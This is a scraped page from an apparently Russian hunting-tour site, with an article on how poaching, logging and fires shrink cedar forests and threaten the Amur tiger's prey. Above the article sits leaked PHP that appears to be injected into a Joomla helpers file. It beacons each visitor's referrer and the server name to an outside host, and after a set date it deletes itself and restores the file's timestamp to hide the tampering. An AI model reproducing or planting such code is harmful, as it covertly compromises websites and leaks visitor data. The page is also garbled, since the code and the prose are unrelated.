check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727465){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } Кедровые леса как кормовая база исчезающих видов животных

Заказать Охотничий тур или Сафари

Трофейная Охота

Охотничьи собаки

Найти на нашем сайте

Производственные Компании

Сейчас Онлайн

Сейчас 1241 гостей онлайн

Звоните и узнавайте места

текущего сезона охоты

Кедровые леса как кормовая база исчезающих видов животных

Последние годы браконьерская  вырубка леса и пожары лишили кормовой базы кабана и пятнистого оленя, которые, в свою очередь, были кормовой базой тигра. Сегодня численность тигров уже начала вызывать серьезное беспокойство.

Значение кедровых лесов огромно. Причем, не важно, природа ли распорядилась разместить тут кедровый лес, или муниципалитет города решил купить саженцы и посадить лесопосадку-кедровник, значение их не умаляется.

Природные леса, правда, занимают значительно большую площадь, да и животных, желающих полакомиться кедровыми орешками или погрызть проклюнувшиеся сеянцы кедра сибирского, тут будет намного больше. Лось вряд ли станет завсегдатаем лесопосадки, а вот, например, белки или мышевидные грызуны обязательно окажутся тут как тут, если посадка начнет плодоносить полезными и питательными кедровыми орешками. Кроме того, в кедровых лесах растут разные съедобные грибы и ягоды.

Что касается ценности кедровых орехов, то ученые подсчитали, что, если собрать и переработать в масло их годовой урожай, то можно удовлетворить в масле мировую человеческую потребность. Жиров в орехах содержится более 64%, азотистых веществ в виде легко усваиваемых белков – до 19%, кроме того, в них много минеральных веществ и витаминов, в том числе особо ценных, как витамины В6, D, которые улучшают состав крови и благоприятно воздействует на кожные покровы.  Хвоя богата витаминами С, А, фитонцидами, микроэлементами – медью, марганцем, кобальтом, железом и фосфором. Из нее готовят витаминную муку как ценный продукт животноводства.

Известны давно и лечебные свойства кедровой смолы – живицы. В связи с этими ценными качествами кедровые леса полезны, как для человека, так и являются богатой кормовой базой для множества животных. Соболь и белка, которые представляют собой ценные промысловые породы, питаются кедровыми орехами. За год для полноценного питания им достаточно всего 6-8 килограммов орехов. Немалое место занимают орехи и в рационе медведей, кабанов, бурундуков и пр.

Последние годы вызывает опасение уменьшение численности тигров. Одной из причин является плохо контролируемое браконьерство. Но есть и другая причина. Она состоит в том, что уменьшается территория природных мест обитания, как самого хищника, так и тех животных, которые являются его добычей. Это пожары и, конечно, вырубка лесов - с 2001 по 2008 годы браконьерская вырубка увеличилась на 60%, и за последние пять лет на экспорт было отправлено  186 тыс. кубометров ценной кедровой древесины, что уменьшило территории кедровых лесов на 27% .

Кроме того, с 1983 года произошло несколько суровых многоснежных зим, которые привели к падежу копытных – основного питания хищников, в связи с чем был начат массовый отстрел тигров. 

Таким образом, вырубка леса лишила кормовой базы кабана и пятнистого оленя, которые, в свою очередь, были кормовой базой тигра. Сегодня численность тигров уже начала вызывать серьезное беспокойство. 

AddThis Social Bookmark Button
 

Добавить комментарий


Защитный код
Обновить